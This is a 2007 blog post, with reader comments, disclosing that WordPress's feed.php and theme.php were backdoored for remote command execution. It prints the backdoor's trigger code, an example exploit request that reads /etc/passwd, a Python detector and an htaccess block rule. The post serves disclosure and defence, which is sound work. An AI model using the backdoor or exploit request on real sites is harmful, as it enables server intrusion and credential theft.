Saturday, March 3, 2007

WordPress source code compromised to enable remote code execution

While assessing the security of WordPress, a popular blog creation software, I have discovered that its source code has recently been compromised by a third party in order to enable remote command execution on the machines running affected versions. The compromised files are wp-includes/feed.php and wp-includes/theme.php.
The following code has been added:

in wp-includes/feed.php:

    function comment_text_phpfilter($filterdata) {
    if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }

in wp-includes/theme.php:

    function get_theme_mcommand($mcds) {
    if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }

This would enable remote command execution on machines running compromised versions, for example:

    http://wordpressurl/wp-includes/theme.php?iz=cat /etc/passwd

I discovered this vulnerability on Friday, March 2nd 2007 and contacted WordPress about it straight away. They reacted promptly by disabling downloads pending further investigation. They later determined that only one of two servers had been compromised and that the two files mentioned above are the only ones changed.

It seems that the above files were changed on Feb 25th, 2007, so if you downloaded WordPress between Feb 25th, 2007 and Mar 2nd, 2007 you may be running a compromised version; be sure to check for the above code.
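As an added example (not code from the original post or from WordPress), the following Python checks an installation's wp-includes files for the strings described above and scans web-server access-log lines for requests that would trigger the added code; the file contents and log lines are constructed for the demonstration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Files and strings the post identifies as added by the attacker.  Stock
# WordPress defines neither function, so any match is a positive.
INDICATORS = {
    "wp-includes/feed.php": ["comment_text_phpfilter", '$_GET["ix"]'],
    "wp-includes/theme.php": ["get_theme_mcommand", '$_GET["iz"]'],
}
TRIGGER_PARAMS = {"ix", "iz"}
BACKDOORED_PATHS = ("/wp-includes/feed.php", "/wp-includes/theme.php")


def find_backdoor(relpath, contents):
    """Return the indicator strings present in the contents of `relpath`."""
    return [s for s in INDICATORS.get(relpath, []) if s in contents]


# Request line inside a combined-log-format record: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[0-9.]+"')


def find_trigger_attempts(log_lines):
    """Return (line_no, path, params) for requests to a backdoored file that
    carry ix/iz with a non-empty value.  An empty value is ignored because
    the added code only acts when $_GET["ix"] / $_GET["iz"] is truthy."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path not in BACKDOORED_PATHS:
            continue
        # parse_qs drops blank values by default, matching PHP's truthiness test
        used = {k: v for k, v in parse_qs(parts.query).items() if k in TRIGGER_PARAMS}
        if used:
            hits.append((n, parts.path, used))
    return hits


# Constructed sample contents: a stock-looking theme.php and one carrying the
# added code (the attacker's function body is not reproduced, as in the post).
CLEAN_THEME = "<?php\nfunction get_theme($theme) {\n    /* ... */\n}\n"
TROJANED_THEME = CLEAN_THEME + (
    "function get_theme_mcommand($mcds) {\n    /* body omitted */\n}\n"
    'if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }\n'
)

# Constructed access-log lines; line 2 mirrors the post's example request.
SAMPLE_LOG = [
    '10.0.0.5 - - [02/Mar/2007:10:01:02 +0100] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla"',
    '10.0.0.5 - - [02/Mar/2007:10:01:03 +0100] "GET /wp-includes/theme.php?iz=cat%20/etc/passwd HTTP/1.1" 200 1840 "-" "-"',
    '10.0.0.9 - - [02/Mar/2007:10:02:11 +0100] "GET /?s=matrix&fix=1 HTTP/1.1" 200 4096 "-" "Mozilla"',
    '10.0.0.5 - - [02/Mar/2007:10:03:00 +0100] "GET /wp-includes/feed.php?ix= HTTP/1.1" 200 12 "-" "-"',
]

if __name__ == "__main__":
    print("clean:", find_backdoor("wp-includes/theme.php", CLEAN_THEME))
    print("trojaned:", find_backdoor("wp-includes/theme.php", TROJANED_THEME))
    for hit in find_trigger_attempts(SAMPLE_LOG):
        print("trigger attempt:", hit)
```

Run against a real install by reading each listed file and passing its contents to find_backdoor, and by feeding the server's access log to find_trigger_attempts.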

About WordPress
"WordPress is a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability. What a mouthful. WordPress is both free and priceless at the same time."

Thanks to Ryan Boren of WordPress for quick response and his feedback regarding this issue.


Mr Apache said...

Code to forbid requests whose query string carries ix or iz:

    # match ix= or iz= as a parameter name rather than "ix"/"iz" anywhere in the query string
    RewriteCond %{QUERY_STRING} (^|&)(ix|iz)= [NC]
    RewriteRule .* - [F]

Ultimate htaccess article

Doug Karr said...


Could this be utilized to obtain any information from the source site? Example: logins, passwords, MySQL configuration, OpenID configuration, etc?

I'm curious if simply downloading and installing the corrected software is a total solution or whether or not anyone is advising WP users to reconfigure their logins/passwords, etc.


Ivan Fratric said...

Dear Doug,

the exploitation of this, by itself, leads to command execution on the affected machine under the privileges of the web server user, typically 'nobody'. This means that the cracker could read any files readable to this user. This typically includes web application configuration files (which typically contain the MySQL username and password the web application uses to connect to the database), as well as files such as /etc/passwd, which contains a list of usernames for the server, which could be used in brute-force type attacks. The cracker could also modify any files writeable by this user and also upload files in folders writeable to this user.

However, you should also consider the following - obtaining the admin privileges on the machine once you have established the remote access, even as an unprivileged user, is usually by far easier than obtaining the remote access itself.

So to conclude, if you were running the compromised version (and it's quite easy to check if you kept the downloaded archive somewhere) it would be best if you changed all relevant passwords and logins where appropriate.

Ivan Fratric said...

Plus, the cracker might manage to put some kind of backdoor on the server using this, so the absolutely safest thing to do would be to make a clean install of everything.

ceras said...

That bug doesn't work; I have WordPress from January, these files feed.php ...

and the execution command doesn't work, I get a white page :)

That fucking bullshit is not a bug

Ivan Fratric said...


You wouldn't be affected if you downloaded WordPress in January, only if you downloaded it between Feb 25th and Mar 2nd and only if you downloaded it from the compromised server.

If you want confirmation, take a look at

Shelly said...

I had a question. I just installed WP 2.1 (NOT 2.1.1) a few weeks ago for a client who needed 16 different installations (didn't want to use MU).

I've been told by the wp-pro list that I *should* be okay with 2.1, because the exploit wasn't in that version (and if it were, I had downloaded my copy January 28 - so I'm in the clear anyway). However, someone said that the reason 2.1.1 was released was to fix another security flaw, and I should have upgraded anyway.

I guess I'd like to know this: should I download the new 2.1.2 and upgrade all 16 of those blogs already? I don't know what security flaw is in 2.1 - nothing was mentioned - but I'd appreciate any advice on this.

Ivan Fratric said...


You really should be asking this in a WordPress support forum.
Having said that, I'm not aware of any vulnerabilities fixed from 2.1 to 2.1.1 (which doesn't mean there weren't any), but there are known vulnerabilities in 2.1.1 which are possibly present in previous versions as well. You can find out the details at
These are all script injection vulnerabilities. They aren't exactly what I would call critical, but should be taken care of nevertheless.

Shelly said...

Thanks Ivan,

Actually, I *did* ask at the support forums - I guess I'm impatient ;) I did get advice on basically what you said: that it wouldn't hurt to upgrade to 2.1.2, but it's not absolutely necessary.

I've already emailed the client with this information, and I'm letting them decide what they want me to do. I couldn't find the exact information you gave me (about the injection), but I did tell them there wouldn't have been an upgrade if it weren't something important.

Thanks for your advice - I appreciate it :)

Anonymous said...

For the time being this bug is not working on any of the WordPress installs I tried. But this post is good, thanks for sharing..

Best Regards,
Eliena Andrews

Piyush said...

Hi Ivan,
I have posted about your discovery on my blog. Here is the link.
Thanks for sharing this.

Vignesh B said...

The Hacker who is able to execute such a flaw is usually able to execute commands with the programming language or the web server.
This will be very helpful for protecting our databases from the vulnerabilities .
Thank you admin.

Blog Adresleri said...

One of the core parts of WordPress is without doubt wp-includes. We can say that all of the core components that make up the CMS are located here. Accordingly, to keep your site secure you should pay serious attention to this folder. In this post of mine we will look at protecting the WordPress wp-includes folder.
